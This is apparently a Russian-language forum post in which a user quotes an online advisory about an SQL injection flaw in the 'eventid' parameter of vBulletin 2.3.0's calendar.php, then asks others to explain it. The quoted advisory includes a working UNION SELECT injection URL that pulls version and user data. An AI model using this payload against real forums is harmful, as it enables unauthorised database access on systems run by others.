Вот еще  - кто нибуть сталкивался с vBulletin 2.3.0 ???

нашел в нете:

" Уязвимость в проверке правильности входных данных обнаружена в vBulletin в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды.

Уязвимость обнаружена в параметре 'eventid'в сценарии calendar.php. Пример (добавляет событие (#14)):

calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate "
И НИФига не понял кно нить обяснит ПЛЗ ...